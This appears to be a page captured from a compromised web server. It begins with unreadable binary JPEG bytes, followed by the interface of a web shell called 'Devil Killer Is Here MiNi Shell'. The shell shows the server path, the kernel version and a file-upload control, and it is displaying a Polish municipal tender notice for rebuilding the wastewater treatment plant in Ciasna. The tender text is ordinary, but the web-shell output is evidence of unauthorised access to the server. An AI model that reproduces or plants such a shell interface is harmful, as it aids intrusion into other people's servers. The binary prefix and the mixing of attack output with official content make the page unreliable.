JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250704/0030926301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa oczyszczalni ścieków w Ciasnej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CIASNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398416</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowa 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciasna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-793</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ciasna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ciasna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa oczyszczalni ścieków w Ciasnej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d01a2e96-e5e8-4960-84cf-a2e68c66e563</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00309263</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Art. 68. Przekazywanie ofert, wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia <br/>lub w konkursie, wniosków, o których mowa w art. 371 ust. 3, oraz prac konkursowych odbywa się przy <br/>użyciu środków komunikacji elektronicznej, zapewniających zachowanie integralności, autentyczności, <br/>nienaruszalności danych i ich poufności w ramach wymiany i przechowywania informacji, w tym <br/>zapewniających możliwość zapoznania się z ich treścią wyłącznie po upływie terminu na ich składanie. <br/>1. Komunikacja między zamawiającym a wykonawcą. <br/>1.1 JOSEPHINE to aplikacja internetowa znajdująca się na domenie https://josephine.proebiz.com, która <br/>jest przeznaczona do elektronicznej komunikacji między zamawiającym a wykonawcą w rozumieniu <br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. 2024 r., poz. 1320 z późniejszymi <br/>zmianami). <br/>1.2 Zamawiający będzie komunikował się z wykonawcami za pośrednictwem modułu komunikacyjnego <br/>systemu JOSEPHINE. Złożenie oferty, złożenie wniosku o dopuszczenie do udziału, złożenie wniosku o <br/>wyjaśnienie dokumentacji przetargowej, uzupełnienie kwalifikacji, wyjaśnienie ofert, zgłaszanie <br/>sprzeciwu, nastąpi pomiędzy zainteresowaną stroną (zwana dalej „wykonawcą”) i zamawiającym <br/>wyłącznie drogą elektroniczną w języku polskim oraz w sposób gwarantujący kompletność danych <br/>zawartych we wszystkich dokumentach, w tym ochronę danych poufnych i osobowych. Ta metoda <br/>komunikacji dotyczy wszelkiej komunikacji elektronicznej między zamawiającym a wykonawcą, w tym <br/>komunikacji w dynamicznym systemie zakupów (zwanym dalej „DSZ”). <br/>1.3 Aby bezproblemowo korzystać z systemu JOSEPHINE, konieczne jest korzystanie z komputera <br/>podłączonego do internetu i przeglądarki internetowej. Szczegółowe informacje dotyczące wymagań <br/>technicznych znajdują się pod adresem <br/>https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf <br/>3.8 Ofertę oraz oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, <br/>składa się, przy użyciu środków komunikacji elektronicznej pod rygorem nieważności, w formie <br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.9 Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w jednym ze <br/>wskazanych przez Zamawiającego formacie danych i opatrzona kwalifikowanym podpisem <br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Uszczegółowienie i pozostałe ustalenia odnośnie wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej zawarte są w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 <br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w <br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 <br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 z późniejszymi zmianami), dalej <br/>„RODO”, informuję, że: - W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania <br/>postępowania czy realizacji umowy na: „Przebudowa oczyszczalni ścieków w Ciasnej&#34; w Gminie Ciasna <br/>Pani/Pana danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego <br/>właściwego w sprawach ochrony danych osobowych. - Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych <br/>osobowych stanowi przepis prawa Pani/Pan dane mogą być przetwarzane w sposób zautomatyzowany i <br/>nie będą profilowane. <br/> administratorem Pani/Pana danych osobowych jest Urząd Gminy Ciasna <br/> w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem <br/>Ochrony Danych pod adresem e-mail: aleksandra@eduodo.pl lub iod@eduodo.pl; <br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z <br/>postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, <br/>numer/ prowadzonym w trybie przetargu nieograniczonego; <br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej <br/>„ustawa Pzp”; <br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 <br/>lat od dnia składania ofert a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą ww przedział <br/>czasowy, okres przechowywania obejmuje ten termin; <br/> <br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest <br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o <br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO; <br/> posiada Pani/Pan: <br/>− <br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>− <br/>− <br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; <br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych <br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− <br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że <br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/> nie przysługuje Pani/Panu: <br/>− <br/>− <br/>− <br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ID.271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia: Przebudowa oczyszczalni ścieków w Ciasnej <br/>Przedmiotem zamówienia jest zaprojektowanie i wykonanie przebudowy istniejącej oczyszczalni ścieków <br/>w Ciasnej wraz ze wszystkimi uzgodnieniami i pozwoleniami formalno-prawnymi zezwalającymi na <br/>przeprowadzenie zamówienia publicznego zgodnie z obowiązującym prawem zamówień publicznych, a <br/>następnie rozpoczęcie wykonywania robót i oddanie do użytkowania w pełni sprawnej oczyszczalni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45252127-4 - Roboty budowlane w zakresie oczyszczalni ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45252200-0 - Wyposażenie oczyszczalni ścieków</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami i wagami: <br/> <br/>1) cena waga ( Kc ): 60% <br/>2) termin gwarancji i rękojmi na roboty budowlane waga ( Kg ): 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium – termin gwarancji i rękojmi na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1) Zdolności do występowania w obrocie gospodarczym oraz uprawnień do prowadzenia <br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający opisuje warunku udziału. <br/>2) Zdolność techniczna lub zawodowa <br/>a) Wiedza i doświadczenie. <br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał w terminie ostatnich 5 lat przed upływem <br/>terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 1 <br/>robotę budowlaną podobnej do objętej przedmiotem zamówienia. Warunek zostanie spełniony (definicja podobieństwa), jeżeli wykonawca ukończył zadanie polegające na modernizacji, budowie lub rozbudowie <br/>oczyszczalni ścieków o wartości umownej brutto min 800 000,00zł. <br/>Warunek ten ma spełniać samodzielnie Wykonawca lub samodzielnie jeden z konsorcjantów lub <br/>samodzielnie jeden podmiot udostępniający zasoby wiedzy i doświadczenia. <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia <br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z <br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są <br/>wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego <br/>oferta zostanie oceniona zostanie wezwany do złożenia wykazu potwierdzającego spełnienie tego <br/>warunku udziału w postępowaniu – wg Załącznika nr 6 SWZ. <br/>2) Zdolność techniczna lub zawodowa – cd. <br/>b) Warunek dysponowania osobami – minimalny zakres kwalifikacji i doświadczenia <br/>wymagany od osób skierowanych do realizacji zamówienia. <br/>Wykonawca musi wykazać osoby, które zostaną skierowane do realizacji zamówienia posiadające <br/>kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia <br/>oraz Wykonawca musi wykazać że będzie dysponował osobami podając podstawę do dysponowania tymi <br/>osobami. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie <br/>dysponować osobami zdolnymi do wykonywania zamówienia: - Kierownik robót branży urządzeń wodociągowych i kanalizacyjnych - minimum 1 osoba na <br/>stanowisku kierownika robót, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności urządzeń wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które <br/>zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym <br/>samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych <br/>architektów oraz inżynierów budownictwa <br/>(tekst jednolity: Dz. U. z 2019 r. poz. 1117) lub spełniającą warunki, o których mowa w art. 12a ustawy z <br/>dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2021 poz. 2351 z późn. zm.), tj. osobą, której <br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub <br/>spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych <br/>architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). - Kierownik robót branży urządzeń elektrycznych i elektroenergetycznych - minimum 1 osoba na <br/>stanowisku kierownika robót, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, <br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym <br/>samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych <br/>architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2016 r. poz. 1725) lub spełniającą <br/>warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. <br/>z 2017 poz. 1332z późn. zm.), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na <br/>zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy <br/>z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie <br/>usług transgranicznych”). <br/>- Kierownik robót budowlanych – kierownik budowy- minimum 1 osoba na stanowisku kierownika <br/>budowy, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności <br/>konstrukcyjno – budowlanej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z <br/>przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów <br/>budownictwa (tekst jednolity: Dz. U. z 2019 r. poz. 1117) lub spełniającą warunki, o których mowa w art. <br/>12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2021 poz. 2351 z późn. zm.), tj. <br/>osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach <br/>odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach <br/>zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). <br/>Osoba, która będzie wskazana w wykazie będzie pełniła funkcję głównego kierownika budowy i <br/>będzie odpowiedzialna za ogół prac. <br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego <br/>oferta zostanie oceniona zostanie wezwany do złożenia wykazu potwierdzającego spełnienie tego warunku <br/>udziału w postępowaniu – wg Załącznika nr 7 SWZ. <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten musi spełnić co najmniej <br/>jeden z wykonawców składających ofertę wspólną. W odniesieniu do warunków dotyczących wykształcenia, <br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do <br/>realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni wykonawcy. <br/>2) Zdolność techniczna lub zawodowa – cd. <br/>c) Wykonawca musi dysponować przez cały okres realizacji zamówienia następującym <br/>potencjałem technicznym: <br/>Zamawiający nie dokonuje określenia sposobu spełniania warunku. <br/>3) Sytuacji ekonomicznej lub finansowej <br/>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że : <br/>a) <br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/>przedmiotem zamówienia na sumę gwarancyjną tego ubezpieczenia nie mniejszą niż 700 000,00 PLN. <br/>Zamawiający nie wprowadza w tym zakresie żadnych wzorów. Dokumenty składane w zależności od <br/>rodzaju składanego dokumentu (dokumentów). Dopuszczalne jest sumowanie i łączenie przez wykonawcę <br/>/ wykonawców składających ofertę wspólną czy podmiot udostępniający zasoby. <br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, <br/>którego oferta zostanie oceniona zostanie wezwany do złożenia wykazu potwierdzającego <br/>spełnienie tego warunku udziału w postępowaniu. <br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub <br/>kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający żąda, następujących <br/>podmiotowych środków dowodowych: <br/>1) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy <br/>gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego <br/>podmiotowych środków dowodowych, o 